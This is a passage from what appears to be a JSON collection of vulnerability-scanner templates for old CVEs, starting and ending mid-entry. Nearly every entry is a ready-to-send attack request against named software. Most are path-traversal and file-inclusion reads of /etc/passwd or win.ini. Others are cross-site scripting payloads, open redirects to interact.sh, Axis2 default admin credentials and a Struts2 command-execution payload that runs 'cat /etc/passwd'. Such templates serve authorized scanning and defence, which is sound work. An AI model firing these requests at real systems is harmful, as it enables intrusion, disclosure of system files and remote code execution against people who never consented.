{{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Monitor ="]}]},{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File 